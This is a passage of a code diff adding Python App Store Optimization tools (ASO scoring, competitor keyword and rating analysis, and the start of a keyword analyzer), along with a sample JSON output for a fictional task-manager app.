            conversion_score = 35 + (proportion * 35)
        else:
            conversion_score = (conversion_rate / self.BENCHMARKS['conversion_rate']['min']) * 35

        # Download velocity score (0-20 points)
        if downloads_30d > 10000:
            velocity_score = 20
        elif downloads_30d > 1000:
            velocity_score = 15
        elif downloads_30d > 100:
            velocity_score = 10
        else:
            velocity_score = 5

        # Trend bonus (0-10 points)
        if downloads_trend == 'up':
            trend_score = 10
        elif downloads_trend == 'stable':
            trend_score = 5
        else:
            trend_score = 0

        total_score = conversion_score + velocity_score + trend_score

        return round(min(total_score, 100), 1)
    def generate_recommendations(
        self,
        metadata_score: float,
        ratings_score: float,
        keyword_score: float,
        conversion_score: float
    ) -> List[Dict[str, Any]]:
        """Generate prioritized recommendations based on scores."""
        recommendations = []

        # Metadata recommendations
        if metadata_score < 60:
            recommendations.append({
                'category': 'metadata_quality',
                'priority': 'high',
                'action': 'Optimize app title and description',
                'details': 'Add more keywords to title, expand description to 1500-2000 characters, improve keyword density to 3-5%',
                'expected_impact': 'Improve discoverability and ranking potential'
            })
        elif metadata_score < 80:
            recommendations.append({
                'category': 'metadata_quality',
                'priority': 'medium',
                'action': 'Refine metadata for better keyword targeting',
                'details': 'Test variations of title/subtitle, optimize keyword field for Apple',
                'expected_impact': 'Incremental ranking improvements'
            })

        # Ratings recommendations
        if ratings_score < 60:
            recommendations.append({
                'category': 'ratings_reviews',
                'priority': 'high',
                'action': 'Improve rating quality and volume',
                'details': 'Address top user complaints, implement in-app rating prompts, respond to negative reviews',
                'expected_impact': 'Better conversion rates and trust signals'
            })
        elif ratings_score < 80:
            recommendations.append({
                'category': 'ratings_reviews',
                'priority': 'medium',
                'action': 'Increase rating velocity',
                'details': 'Optimize timing of rating requests, encourage satisfied users to rate',
                'expected_impact': 'Sustained rating quality'
            })

        # Keyword performance recommendations
        if keyword_score < 60:
            recommendations.append({
                'category': 'keyword_performance',
                'priority': 'high',
                'action': 'Improve keyword rankings',
                'details': 'Target long-tail keywords with lower competition, update metadata with high-potential keywords, build backlinks',
                'expected_impact': 'Significant improvement in organic visibility'
            })
        elif keyword_score < 80:
            recommendations.append({
                'category': 'keyword_performance',
                'priority': 'medium',
                'action': 'Expand keyword coverage',
                'details': 'Target additional related keywords, test seasonal keywords, localize for new markets',
                'expected_impact': 'Broader reach and more discovery opportunities'
            })

        # Conversion recommendations
        if conversion_score < 60:
            recommendations.append({
                'category': 'conversion_metrics',
                'priority': 'high',
                'action': 'Optimize store listing for conversions',
                'details': 'Improve screenshots and icon, strengthen value proposition in description, add video preview',
                'expected_impact': 'Higher impression-to-install conversion'
            })
        elif conversion_score < 80:
            recommendations.append({
                'category': 'conversion_metrics',
                'priority': 'medium',
                'action': 'Test visual asset variations',
                'details': 'A/B test different icon designs and screenshot sequences',
                'expected_impact': 'Incremental conversion improvements'
            })

        return recommendations
    def _assess_health_status(self, overall_score: float) -> str:
        """Assess overall ASO health status."""
        if overall_score >= 80:
            return "Excellent - Top-tier ASO performance"
        elif overall_score >= 65:
            return "Good - Competitive ASO with room for improvement"
        elif overall_score >= 50:
            return "Fair - Needs strategic improvements"
        else:
            return "Poor - Requires immediate ASO overhaul"

    def _prioritize_actions(
        self,
        recommendations: List[Dict[str, Any]]
    ) -> List[Dict[str, Any]]:
        """Prioritize actions by impact and urgency."""
        # Sort by priority (high first) and expected impact
        priority_order = {'high': 0, 'medium': 1, 'low': 2}

        sorted_recommendations = sorted(
            recommendations,
            key=lambda x: priority_order[x['priority']]
        )

        return sorted_recommendations[:3]  # Top 3 priority actions

    def _identify_strengths(self, score_breakdown: Dict[str, Any]) -> List[str]:
        """Identify areas of strength (scores >= 75)."""
        strengths = []

        for category, data in score_breakdown.items():
            if data['score'] >= 75:
                strengths.append(
                    f"{category.replace('_', ' ').title()}: {data['score']}/100"
                )

        return strengths if strengths else ["Focus on building strengths across all areas"]

    def _identify_weaknesses(self, score_breakdown: Dict[str, Any]) -> List[str]:
        """Identify areas needing improvement (scores < 60)."""
        weaknesses = []

        for category, data in score_breakdown.items():
            if data['score'] < 60:
                weaknesses.append(
                    f"{category.replace('_', ' ').title()}: {data['score']}/100 - needs improvement"
                )

        return weaknesses if weaknesses else ["All areas performing adequately"]


def calculate_aso_score(
    metadata: Dict[str, Any],
    ratings: Dict[str, Any],
    keyword_performance: Dict[str, Any],
    conversion: Dict[str, Any]
) -> Dict[str, Any]:
    """
    Convenience function to calculate ASO score.

    Args:
        metadata: Metadata quality metrics
        ratings: Ratings data
        keyword_performance: Keyword ranking data
        conversion: Conversion metrics

    Returns:
        Complete ASO score report
    """
    scorer = ASOScorer()
    return scorer.calculate_overall_score(
        metadata,
        ratings,
        keyword_performance,
        conversion
    )
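Each scoring method above applies the same piecewise-linear banding: full points at or above a target benchmark, interpolation between the minimum and the target, and proportional partial credit below the minimum. A minimal standalone sketch of that pattern (the function name and parameters are illustrative, not part of the module):

```python
def banded_score(value: float, min_val: float, target: float,
                 floor: float, cap: float) -> float:
    """Piecewise-linear score: cap at/above target, interpolated between
    min and target, proportional partial credit below min."""
    if value >= target:
        return cap
    if value >= min_val:
        proportion = (value - min_val) / (target - min_val)
        return floor + proportion * (cap - floor)
    return (value / min_val) * floor
```

For example, with a band running from a minimum of 4.0 to a target of 4.5 worth 30-50 points, a value of 4.25 sits halfway through the band and scores 40.0, while a value of 2.0 earns half of the 30-point floor.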
577
skills/app-store-optimization/competitor_analyzer.py
Normal file
@@ -0,0 +1,577 @@
"""
|
||||||
|
Competitor analysis module for App Store Optimization.
|
||||||
|
Analyzes top competitors' ASO strategies and identifies opportunities.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional
|
||||||
|
from collections import Counter
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
class CompetitorAnalyzer:
|
||||||
|
"""Analyzes competitor apps to identify ASO opportunities."""
|
||||||
|
|
||||||
|
def __init__(self, category: str, platform: str = 'apple'):
|
||||||
|
"""
|
||||||
|
Initialize competitor analyzer.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
category: App category (e.g., "Productivity", "Games")
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
"""
|
||||||
|
self.category = category
|
||||||
|
self.platform = platform
|
||||||
|
self.competitors = []
|
||||||
|
|
||||||
|
def analyze_competitor(
|
||||||
|
self,
|
||||||
|
app_data: Dict[str, Any]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Analyze a single competitor's ASO strategy.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_data: Dictionary with app_name, title, description, rating, ratings_count, keywords
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Comprehensive competitor analysis
|
||||||
|
"""
|
||||||
|
app_name = app_data.get('app_name', '')
|
||||||
|
title = app_data.get('title', '')
|
||||||
|
description = app_data.get('description', '')
|
||||||
|
rating = app_data.get('rating', 0.0)
|
||||||
|
ratings_count = app_data.get('ratings_count', 0)
|
||||||
|
keywords = app_data.get('keywords', [])
|
||||||
|
|
||||||
|
analysis = {
|
||||||
|
'app_name': app_name,
|
||||||
|
'title_analysis': self._analyze_title(title),
|
||||||
|
'description_analysis': self._analyze_description(description),
|
||||||
|
'keyword_strategy': self._extract_keyword_strategy(title, description, keywords),
|
||||||
|
'rating_metrics': {
|
||||||
|
'rating': rating,
|
||||||
|
'ratings_count': ratings_count,
|
||||||
|
'rating_quality': self._assess_rating_quality(rating, ratings_count)
|
||||||
|
},
|
||||||
|
'competitive_strength': self._calculate_competitive_strength(
|
||||||
|
rating,
|
||||||
|
ratings_count,
|
||||||
|
len(description)
|
||||||
|
),
|
||||||
|
'key_differentiators': self._identify_differentiators(description)
|
||||||
|
}
|
||||||
|
|
||||||
|
self.competitors.append(analysis)
|
||||||
|
return analysis
|
||||||
|
|
||||||
|
    def compare_competitors(
        self,
        competitors_data: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Compare multiple competitors and identify patterns.

        Args:
            competitors_data: List of competitor data dictionaries

        Returns:
            Comparative analysis with insights
        """
        # Analyze each competitor
        analyses = []
        for comp_data in competitors_data:
            analysis = self.analyze_competitor(comp_data)
            analyses.append(analysis)

        # Extract common keywords across competitors
        all_keywords = []
        for analysis in analyses:
            all_keywords.extend(analysis['keyword_strategy']['primary_keywords'])

        common_keywords = self._find_common_keywords(all_keywords)

        # Identify keyword gaps (used by some but not all)
        keyword_gaps = self._identify_keyword_gaps(analyses)

        # Rank competitors by strength
        ranked_competitors = sorted(
            analyses,
            key=lambda x: x['competitive_strength'],
            reverse=True
        )

        # Analyze rating distribution
        rating_analysis = self._analyze_rating_distribution(analyses)

        # Identify best practices
        best_practices = self._identify_best_practices(ranked_competitors)

        return {
            'category': self.category,
            'platform': self.platform,
            'competitors_analyzed': len(analyses),
            'ranked_competitors': ranked_competitors,
            'common_keywords': common_keywords,
            'keyword_gaps': keyword_gaps,
            'rating_analysis': rating_analysis,
            'best_practices': best_practices,
            'opportunities': self._identify_opportunities(
                analyses,
                common_keywords,
                keyword_gaps
            )
        }
    def identify_gaps(
        self,
        your_app_data: Dict[str, Any],
        competitors_data: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Identify gaps between your app and competitors.

        Args:
            your_app_data: Your app's data
            competitors_data: List of competitor data

        Returns:
            Gap analysis with actionable recommendations
        """
        # Analyze your app
        your_analysis = self.analyze_competitor(your_app_data)

        # Analyze competitors
        competitor_comparison = self.compare_competitors(competitors_data)

        # Identify keyword gaps
        your_keywords = set(your_analysis['keyword_strategy']['primary_keywords'])
        competitor_keywords = set(competitor_comparison['common_keywords'])
        missing_keywords = competitor_keywords - your_keywords

        # Identify rating gap
        avg_competitor_rating = competitor_comparison['rating_analysis']['average_rating']
        rating_gap = avg_competitor_rating - your_analysis['rating_metrics']['rating']

        # Identify description length gap
        avg_competitor_desc_length = sum(
            len(comp['description_analysis']['text'])
            for comp in competitor_comparison['ranked_competitors']
        ) / len(competitor_comparison['ranked_competitors'])
        your_desc_length = len(your_analysis['description_analysis']['text'])
        desc_length_gap = avg_competitor_desc_length - your_desc_length

        return {
            'your_app': your_analysis,
            'keyword_gaps': {
                'missing_keywords': list(missing_keywords)[:10],
                'recommendations': self._generate_keyword_recommendations(missing_keywords)
            },
            'rating_gap': {
                'your_rating': your_analysis['rating_metrics']['rating'],
                'average_competitor_rating': avg_competitor_rating,
                'gap': round(rating_gap, 2),
                'action_items': self._generate_rating_improvement_actions(rating_gap)
            },
            'content_gap': {
                'your_description_length': your_desc_length,
                'average_competitor_length': int(avg_competitor_desc_length),
                'gap': int(desc_length_gap),
                'recommendations': self._generate_content_recommendations(desc_length_gap)
            },
            'competitive_positioning': self._assess_competitive_position(
                your_analysis,
                competitor_comparison
            )
        }
    def _analyze_title(self, title: str) -> Dict[str, Any]:
        """Analyze title structure and keyword usage."""
        parts = re.split(r'[-:|]', title)

        return {
            'title': title,
            'length': len(title),
            'has_brand': len(parts) > 0,
            'has_keywords': len(parts) > 1,
            'components': [part.strip() for part in parts],
            'word_count': len(title.split()),
            'strategy': 'brand_plus_keywords' if len(parts) > 1 else 'brand_only'
        }

    def _analyze_description(self, description: str) -> Dict[str, Any]:
        """Analyze description structure and content."""
        lines = description.split('\n')
        word_count = len(description.split())

        # Check for structural elements
        has_bullet_points = '•' in description or '*' in description
        has_sections = any(line.isupper() for line in lines if len(line) > 0)
        has_call_to_action = any(
            cta in description.lower()
            for cta in ['download', 'try', 'get', 'start', 'join']
        )

        # Extract features mentioned
        features = self._extract_features(description)

        return {
            'text': description,
            'length': len(description),
            'word_count': word_count,
            'structure': {
                'has_bullet_points': has_bullet_points,
                'has_sections': has_sections,
                'has_call_to_action': has_call_to_action
            },
            'features_mentioned': features,
            'readability': 'good' if 50 <= word_count <= 300 else 'needs_improvement'
        }
    def _extract_keyword_strategy(
        self,
        title: str,
        description: str,
        explicit_keywords: List[str]
    ) -> Dict[str, Any]:
        """Extract keyword strategy from metadata."""
        # Extract keywords from title
        title_keywords = [word.lower() for word in title.split() if len(word) > 3]

        # Extract frequently used words from description
        desc_words = re.findall(r'\b\w{4,}\b', description.lower())
        word_freq = Counter(desc_words)
        frequent_words = [word for word, count in word_freq.most_common(15) if count > 2]

        # Combine with explicit keywords
        all_keywords = list(set(title_keywords + frequent_words + explicit_keywords))

        return {
            'primary_keywords': title_keywords,
            'description_keywords': frequent_words[:10],
            'explicit_keywords': explicit_keywords,
            'total_unique_keywords': len(all_keywords),
            'keyword_focus': self._assess_keyword_focus(title_keywords, frequent_words)
        }

    def _assess_rating_quality(self, rating: float, ratings_count: int) -> str:
        """Assess the quality of ratings."""
        if ratings_count < 100:
            return 'insufficient_data'
        elif rating >= 4.5 and ratings_count > 1000:
            return 'excellent'
        elif rating >= 4.0 and ratings_count > 500:
            return 'good'
        elif rating >= 3.5:
            return 'average'
        else:
            return 'poor'

    def _calculate_competitive_strength(
        self,
        rating: float,
        ratings_count: int,
        description_length: int
    ) -> float:
        """
        Calculate overall competitive strength (0-100).

        Factors:
        - Rating quality (40%)
        - Rating volume (30%)
        - Metadata quality (30%)
        """
        # Rating quality score (0-40)
        rating_score = (rating / 5.0) * 40

        # Rating volume score (0-30)
        volume_score = min((ratings_count / 10000) * 30, 30)

        # Metadata quality score (0-30)
        metadata_score = min((description_length / 2000) * 30, 30)

        total_score = rating_score + volume_score + metadata_score

        return round(total_score, 1)
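The strength formula above can be restated as a self-contained function for quick experimentation (same weights and saturation points as `_calculate_competitive_strength`; the standalone name is mine):

```python
def competitive_strength(rating: float, ratings_count: int,
                         description_length: int) -> float:
    # Rating quality: up to 40 points, linear in the 0-5 star rating
    rating_score = (rating / 5.0) * 40
    # Rating volume: up to 30 points, saturating at 10,000 ratings
    volume_score = min((ratings_count / 10000) * 30, 30)
    # Metadata depth: up to 30 points, saturating at 2,000 characters
    metadata_score = min((description_length / 2000) * 30, 30)
    return round(rating_score + volume_score + metadata_score, 1)
```

A maxed-out app (5.0 stars, 10,000+ ratings, 2,000+ character description) scores 100.0; a mid-pack app with a 4.0 rating, 5,000 ratings, and a 1,000-character description scores 62.0.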
    def _identify_differentiators(self, description: str) -> List[str]:
        """Identify key differentiators from description."""
        differentiator_keywords = [
            'unique', 'only', 'first', 'best', 'leading', 'exclusive',
            'revolutionary', 'innovative', 'patent', 'award'
        ]

        differentiators = []
        sentences = description.split('.')

        for sentence in sentences:
            sentence_lower = sentence.lower()
            if any(keyword in sentence_lower for keyword in differentiator_keywords):
                differentiators.append(sentence.strip())

        return differentiators[:5]

    def _find_common_keywords(self, all_keywords: List[str]) -> List[str]:
        """Find keywords used by multiple competitors."""
        keyword_counts = Counter(all_keywords)
        # Return keywords used by at least 2 competitors
        common = [kw for kw, count in keyword_counts.items() if count >= 2]
        return sorted(common, key=lambda x: keyword_counts[x], reverse=True)[:20]

    def _identify_keyword_gaps(self, analyses: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
        """Identify keywords used by some competitors but not others."""
        all_keywords_by_app = {}

        for analysis in analyses:
            app_name = analysis['app_name']
            keywords = analysis['keyword_strategy']['primary_keywords']
            all_keywords_by_app[app_name] = set(keywords)

        # Find keywords used by some but not all
        all_keywords_set = set()
        for keywords in all_keywords_by_app.values():
            all_keywords_set.update(keywords)

        gaps = []
        for keyword in all_keywords_set:
            using_apps = [
                app for app, keywords in all_keywords_by_app.items()
                if keyword in keywords
            ]
            if 1 < len(using_apps) < len(analyses):
                gaps.append({
                    'keyword': keyword,
                    'used_by': using_apps,
                    'usage_percentage': round(len(using_apps) / len(analyses) * 100, 1)
                })

        return sorted(gaps, key=lambda x: x['usage_percentage'], reverse=True)[:15]
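The gap-detection loop above (keep keywords used by more than one app but fewer than all of them, ranked by adoption) can be exercised in isolation. A sketch with an illustrative helper name, taking a plain mapping of app name to keyword set rather than the analyzer's internal structures:

```python
def keyword_gaps(keywords_by_app: dict) -> list:
    """Keywords used by more than one app but not by all of them,
    sorted by how widely they are adopted."""
    n_apps = len(keywords_by_app)
    all_keywords = set().union(*keywords_by_app.values())
    gaps = []
    for kw in all_keywords:
        users = [app for app, kws in keywords_by_app.items() if kw in kws]
        if 1 < len(users) < n_apps:
            gaps.append({
                'keyword': kw,
                'used_by': users,
                'usage_percentage': round(len(users) / n_apps * 100, 1)
            })
    return sorted(gaps, key=lambda g: g['usage_percentage'], reverse=True)
```

With three apps where 'tasks' is universal, 'notes' and 'sync' each appear in two of three listings: 'tasks' is excluded (used by all), while 'notes' and 'sync' surface as gaps at 66.7% adoption.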
    def _analyze_rating_distribution(self, analyses: List[Dict[str, Any]]) -> Dict[str, Any]:
        """Analyze rating distribution across competitors."""
        ratings = [a['rating_metrics']['rating'] for a in analyses]
        ratings_counts = [a['rating_metrics']['ratings_count'] for a in analyses]

        return {
            'average_rating': round(sum(ratings) / len(ratings), 2),
            'highest_rating': max(ratings),
            'lowest_rating': min(ratings),
            'average_ratings_count': int(sum(ratings_counts) / len(ratings_counts)),
            'total_ratings_in_category': sum(ratings_counts)
        }

    def _identify_best_practices(self, ranked_competitors: List[Dict[str, Any]]) -> List[str]:
        """Identify best practices from top competitors."""
        if not ranked_competitors:
            return []

        top_competitor = ranked_competitors[0]
        practices = []

        # Title strategy
        title_analysis = top_competitor['title_analysis']
        if title_analysis['has_keywords']:
            practices.append(
                f"Title Strategy: Include primary keyword in title (e.g., '{title_analysis['title']}')"
            )

        # Description structure
        desc_analysis = top_competitor['description_analysis']
        if desc_analysis['structure']['has_bullet_points']:
            practices.append("Description: Use bullet points to highlight key features")

        if desc_analysis['structure']['has_sections']:
            practices.append("Description: Organize content with clear section headers")

        # Rating strategy
        rating_quality = top_competitor['rating_metrics']['rating_quality']
        if rating_quality in ['excellent', 'good']:
            practices.append(
                f"Ratings: Maintain high rating quality ({top_competitor['rating_metrics']['rating']}★) "
                f"with significant volume ({top_competitor['rating_metrics']['ratings_count']} ratings)"
            )

        return practices[:5]
    def _identify_opportunities(
        self,
        analyses: List[Dict[str, Any]],
        common_keywords: List[str],
        keyword_gaps: List[Dict[str, Any]]
    ) -> List[str]:
        """Identify ASO opportunities based on competitive analysis."""
        opportunities = []

        # Keyword opportunities from gaps
        if keyword_gaps:
            underutilized_keywords = [
                gap['keyword'] for gap in keyword_gaps
                if gap['usage_percentage'] < 50
            ]
            if underutilized_keywords:
                opportunities.append(
                    f"Target underutilized keywords: {', '.join(underutilized_keywords[:5])}"
                )

        # Rating opportunity
        avg_rating = sum(a['rating_metrics']['rating'] for a in analyses) / len(analyses)
        if avg_rating < 4.5:
            opportunities.append(
                f"Category average rating is {avg_rating:.1f} - opportunity to differentiate with higher ratings"
            )

        # Content depth opportunity
        avg_desc_length = sum(
            a['description_analysis']['length'] for a in analyses
        ) / len(analyses)
        if avg_desc_length < 1500:
            opportunities.append(
                "Competitors have relatively short descriptions - opportunity to provide more comprehensive information"
            )

        return opportunities[:5]

    def _extract_features(self, description: str) -> List[str]:
        """Extract feature mentions from description."""
        # Look for bullet points or numbered lists
        lines = description.split('\n')
        features = []

        for line in lines:
            line = line.strip()
            # Check if line starts with bullet or number
            if line and (line[0] in ['•', '*', '-', '✓'] or line[0].isdigit()):
                # Clean the line
                cleaned = re.sub(r'^[•*\-✓\d.)\s]+', '', line)
                if cleaned:
                    features.append(cleaned)

        return features[:10]

    def _assess_keyword_focus(
        self,
        title_keywords: List[str],
        description_keywords: List[str]
    ) -> str:
        """Assess keyword focus strategy."""
        overlap = set(title_keywords) & set(description_keywords)

        if len(overlap) >= 3:
            return 'consistent_focus'
        elif len(overlap) >= 1:
            return 'moderate_focus'
        else:
            return 'broad_focus'

    def _generate_keyword_recommendations(self, missing_keywords: set) -> List[str]:
        """Generate recommendations for missing keywords."""
        if not missing_keywords:
            return ["Your keyword coverage is comprehensive"]

        recommendations = []
        missing_list = list(missing_keywords)[:5]

        recommendations.append(
            f"Consider adding these competitor keywords: {', '.join(missing_list)}"
        )
        recommendations.append(
            "Test keyword variations in subtitle/promotional text first"
        )
        recommendations.append(
|
||||||
|
"Monitor competitor keyword changes monthly"
|
||||||
|
)
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _generate_rating_improvement_actions(self, rating_gap: float) -> List[str]:
|
||||||
|
"""Generate actions to improve ratings."""
|
||||||
|
actions = []
|
||||||
|
|
||||||
|
if rating_gap > 0.5:
|
||||||
|
actions.append("CRITICAL: Significant rating gap - prioritize user satisfaction improvements")
|
||||||
|
actions.append("Analyze negative reviews to identify top issues")
|
||||||
|
actions.append("Implement in-app rating prompts after positive experiences")
|
||||||
|
actions.append("Respond to all negative reviews professionally")
|
||||||
|
elif rating_gap > 0.2:
|
||||||
|
actions.append("Focus on incremental improvements to close rating gap")
|
||||||
|
actions.append("Optimize timing of rating requests")
|
||||||
|
else:
|
||||||
|
actions.append("Ratings are competitive - maintain quality and continue improvements")
|
||||||
|
|
||||||
|
return actions
|
||||||
|
|
||||||
|
def _generate_content_recommendations(self, desc_length_gap: int) -> List[str]:
|
||||||
|
"""Generate content recommendations based on length gap."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
if desc_length_gap > 500:
|
||||||
|
recommendations.append(
|
||||||
|
"Expand description to match competitor detail level"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Add use case examples and success stories"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Include more feature explanations and benefits"
|
||||||
|
)
|
||||||
|
elif desc_length_gap < -500:
|
||||||
|
recommendations.append(
|
||||||
|
"Consider condensing description for better readability"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Focus on most important features first"
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
recommendations.append(
|
||||||
|
"Description length is competitive"
|
||||||
|
)
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _assess_competitive_position(
|
||||||
|
self,
|
||||||
|
your_analysis: Dict[str, Any],
|
||||||
|
competitor_comparison: Dict[str, Any]
|
||||||
|
) -> str:
|
||||||
|
"""Assess your competitive position."""
|
||||||
|
your_strength = your_analysis['competitive_strength']
|
||||||
|
competitors = competitor_comparison['ranked_competitors']
|
||||||
|
|
||||||
|
if not competitors:
|
||||||
|
return "No comparison data available"
|
||||||
|
|
||||||
|
# Find where you'd rank
|
||||||
|
better_than_count = sum(
|
||||||
|
1 for comp in competitors
|
||||||
|
if your_strength > comp['competitive_strength']
|
||||||
|
)
|
||||||
|
|
||||||
|
position_percentage = (better_than_count / len(competitors)) * 100
|
||||||
|
|
||||||
|
if position_percentage >= 75:
|
||||||
|
return "Strong Position: Top quartile in competitive strength"
|
||||||
|
elif position_percentage >= 50:
|
||||||
|
return "Competitive Position: Above average, opportunities for improvement"
|
||||||
|
elif position_percentage >= 25:
|
||||||
|
return "Challenging Position: Below average, requires strategic improvements"
|
||||||
|
else:
|
||||||
|
return "Weak Position: Bottom quartile, major ASO overhaul needed"
|
||||||
|
|
||||||
|
|
||||||
|
def analyze_competitor_set(
|
||||||
|
category: str,
|
||||||
|
competitors_data: List[Dict[str, Any]],
|
||||||
|
platform: str = 'apple'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to analyze a set of competitors.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
category: App category
|
||||||
|
competitors_data: List of competitor data
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete competitive analysis
|
||||||
|
"""
|
||||||
|
analyzer = CompetitorAnalyzer(category, platform)
|
||||||
|
return analyzer.compare_competitors(competitors_data)
|
||||||
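The quartile logic in `_assess_competitive_position` is easy to sanity-check in isolation. A minimal standalone sketch (the function name and the sample strength values here are illustrative, not part of the module):

```python
def assess_position(your_strength, competitor_strengths):
    """Mirror of _assess_competitive_position's percentile mapping."""
    if not competitor_strengths:
        return "No comparison data available"
    # Count competitors you outscore, then convert to a percentile.
    better = sum(1 for s in competitor_strengths if your_strength > s)
    pct = (better / len(competitor_strengths)) * 100
    if pct >= 75:
        return "Strong Position"
    elif pct >= 50:
        return "Competitive Position"
    elif pct >= 25:
        return "Challenging Position"
    return "Weak Position"

# Beats 3 of 4 competitors -> 75th percentile -> top quartile.
print(assess_position(72.0, [65.0, 58.5, 80.2, 61.0]))
```

Note that ties do not count as wins, so an app matching every competitor's strength exactly still lands in the bottom quartile.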
170
skills/app-store-optimization/expected_output.json
Normal file
@@ -0,0 +1,170 @@
{
  "request_type": "keyword_research",
  "app_name": "TaskFlow Pro",
  "keyword_analysis": {
    "total_keywords_analyzed": 25,
    "primary_keywords": [
      {
        "keyword": "task manager",
        "search_volume": 45000,
        "competition_level": "high",
        "relevance_score": 0.95,
        "difficulty_score": 72.5,
        "potential_score": 78.3,
        "recommendation": "High priority - target immediately"
      },
      {
        "keyword": "productivity app",
        "search_volume": 38000,
        "competition_level": "high",
        "relevance_score": 0.90,
        "difficulty_score": 68.2,
        "potential_score": 75.1,
        "recommendation": "High priority - target immediately"
      },
      {
        "keyword": "todo list",
        "search_volume": 52000,
        "competition_level": "very_high",
        "relevance_score": 0.85,
        "difficulty_score": 78.9,
        "potential_score": 71.4,
        "recommendation": "High priority - target immediately"
      }
    ],
    "secondary_keywords": [
      {
        "keyword": "team task manager",
        "search_volume": 8500,
        "competition_level": "medium",
        "relevance_score": 0.88,
        "difficulty_score": 42.3,
        "potential_score": 68.7,
        "recommendation": "Good opportunity - include in metadata"
      },
      {
        "keyword": "project planning app",
        "search_volume": 12000,
        "competition_level": "medium",
        "relevance_score": 0.75,
        "difficulty_score": 48.1,
        "potential_score": 64.2,
        "recommendation": "Good opportunity - include in metadata"
      }
    ],
    "long_tail_keywords": [
      {
        "keyword": "ai task prioritization",
        "search_volume": 2800,
        "competition_level": "low",
        "relevance_score": 0.95,
        "difficulty_score": 25.4,
        "potential_score": 82.6,
        "recommendation": "Excellent long-tail opportunity"
      },
      {
        "keyword": "team productivity tool",
        "search_volume": 3500,
        "competition_level": "low",
        "relevance_score": 0.85,
        "difficulty_score": 28.7,
        "potential_score": 79.3,
        "recommendation": "Excellent long-tail opportunity"
      }
    ]
  },
  "competitor_insights": {
    "competitors_analyzed": 4,
    "common_keywords": [
      "task",
      "todo",
      "list",
      "productivity",
      "organize",
      "manage"
    ],
    "keyword_gaps": [
      {
        "keyword": "ai prioritization",
        "used_by": ["None of the major competitors"],
        "opportunity": "Unique positioning opportunity"
      },
      {
        "keyword": "smart task manager",
        "used_by": ["Things 3"],
        "opportunity": "Underutilized by most competitors"
      }
    ]
  },
  "metadata_recommendations": {
    "apple_app_store": {
      "title_options": [
        {
          "title": "TaskFlow - AI Task Manager",
          "length": 26,
          "keywords_included": ["task manager", "ai"],
          "strategy": "brand_plus_primary"
        },
        {
          "title": "TaskFlow: Smart Todo & Tasks",
          "length": 29,
          "keywords_included": ["todo", "tasks"],
          "strategy": "brand_plus_multiple"
        }
      ],
      "subtitle_recommendation": "AI-Powered Team Productivity",
      "keyword_field": "productivity,organize,planner,schedule,workflow,reminders,collaboration,calendar,sync,priorities",
      "description_focus": "Lead with AI differentiation, emphasize team features"
    },
    "google_play_store": {
      "title_options": [
        {
          "title": "TaskFlow - AI Task Manager & Team Productivity",
          "length": 48,
          "keywords_included": ["task manager", "ai", "team", "productivity"],
          "strategy": "keyword_rich"
        }
      ],
      "short_description_recommendation": "AI task manager - Organize, prioritize, and collaborate with your team",
      "description_focus": "Keywords naturally integrated throughout 4000 character description"
    }
  },
  "strategic_recommendations": [
    "Focus on 'AI prioritization' as unique differentiator - low competition, high relevance",
    "Target 'team task manager' and 'team productivity' keywords - good search volume, lower competition than generic terms",
    "Include long-tail keywords in description for additional discovery opportunities",
    "Test title variations with A/B testing after launch",
    "Monitor competitor keyword changes quarterly"
  ],
  "priority_actions": [
    {
      "action": "Optimize app title with primary keyword",
      "priority": "high",
      "expected_impact": "15-25% improvement in search visibility"
    },
    {
      "action": "Create description highlighting AI features with natural keyword integration",
      "priority": "high",
      "expected_impact": "10-15% improvement in conversion rate"
    },
    {
      "action": "Plan A/B tests for icon and screenshots post-launch",
      "priority": "medium",
      "expected_impact": "5-10% improvement in conversion rate"
    }
  ],
  "aso_health_estimate": {
    "current_score": "N/A (pre-launch)",
    "potential_score_with_optimizations": "75-80/100",
    "key_strengths": [
      "Unique AI differentiation",
      "Clear target audience",
      "Strong feature set"
    ],
    "areas_to_develop": [
      "Build rating volume post-launch",
      "Monitor and respond to reviews",
      "Continuous keyword optimization"
    ]
  }
}
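Before a fixture like this is wired into tests, it can be sanity-checked for the fields downstream code depends on. A minimal sketch (the inline string stands in for reading `expected_output.json` from disk, and the chosen checks are assumptions about which fields matter):

```python
import json

# Stand-in for loading skills/app-store-optimization/expected_output.json.
raw = '''{
  "request_type": "keyword_research",
  "keyword_analysis": {
    "primary_keywords": [
      {"keyword": "task manager", "potential_score": 78.3}
    ]
  }
}'''
fixture = json.loads(raw)

# Every keyword entry should carry a bounded potential score.
assert fixture["request_type"] == "keyword_research"
for kw in fixture["keyword_analysis"]["primary_keywords"]:
    assert 0 <= kw["potential_score"] <= 100
print("fixture ok")
```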
406
skills/app-store-optimization/keyword_analyzer.py
Normal file
@@ -0,0 +1,406 @@
"""
|
||||||
|
Keyword analysis module for App Store Optimization.
|
||||||
|
Analyzes keyword search volume, competition, and relevance for app discovery.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional, Tuple
|
||||||
|
import re
|
||||||
|
from collections import Counter
|
||||||
|
|
||||||
|
|
||||||
|
class KeywordAnalyzer:
|
||||||
|
"""Analyzes keywords for ASO effectiveness."""
|
||||||
|
|
||||||
|
# Competition level thresholds (based on number of competing apps)
|
||||||
|
